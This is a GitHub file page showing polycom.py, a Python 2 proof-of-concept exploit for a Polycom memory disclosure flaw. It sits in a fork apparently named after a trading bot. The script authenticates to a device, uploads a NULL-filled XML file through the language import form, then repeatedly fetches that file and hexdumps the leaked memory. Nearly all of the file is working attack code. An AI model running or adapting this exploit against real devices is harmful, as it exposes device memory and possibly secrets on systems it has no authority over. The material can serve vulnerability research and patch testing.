forked from AV1080p/polymarket-trading-bot
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpolycom.py
More file actions
95 lines (71 loc) · 2.06 KB
/
polycom.py
File metadata and controls
95 lines (71 loc) · 2.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
###
# Polycom memory disclosure vulnerability
# ./polycom.py ip username password
import base64
import socket
import string
import sys
def hexdump(src, length=16, sep='.'):
DISPLAY = string.digits + string.letters + string.punctuation
FILTER = ''.join(((x if x in DISPLAY else '.') for x in map(chr, range(256))))
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
if len(hex) > 24:
hex = "%s %s" % (hex[:24], hex[24:])
printable = ''.join(["%s" % FILTER[ord(x)] for x in chars])
lines.append("%08x: %-*s |%s|\n" % (c, length*3, hex, printable))
print ''.join(lines)
ip = sys.argv[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "connecting to %s" % ip
try:
s.connect((ip, 80))
except e:
print e
username = sys.argv[2]
password = sys.argv[3]
authorization = base64.b64encode("%s:%s" % (username, password));
print "Uploading NULL file\n"
NULL = "\x00" * 65000
payload = """------WebKitFormBoundaryBuo67PfA56qM4LSt\r
Content-Disposition: form-data; name="myfile"; filename="poc.xml"\r
Content-Type: text/xml\r
\r
%s\r
------WebKitFormBoundaryBuo67PfA56qM4LSt--\r
""" % NULL
upload_msg = """POST /form-submit/Utilities/languages/importFile HTTP/1.1\r
Host: %s\r
Connection: close\r
Content-Length: %d\r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBuo67PfA56qM4LSt\r
Cookie: Authorization=Basic %s\r
\r
%s\r
""" % (ip, len(payload), authorization, payload)
s.send(upload_msg)
data = s.recv(1024)
print "Done\n"
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Memory Leak Stage\n"
leak_memory = """GET /languages?fileName=poc.xml HTTP/1.1
Host: %s
Connection: close
Cookie: Authorization=Basic %s
""" % (ip , authorization)
s.connect((ip, 80))
print "Leaking memory:\n"
data = ""
while True:
try:
s.send(leak_memory)
data += s.recv(1024)
except:
e = sys.exc_info()[0]
print "Error: %s" %e
break
hexdump(data)
print "Done\n"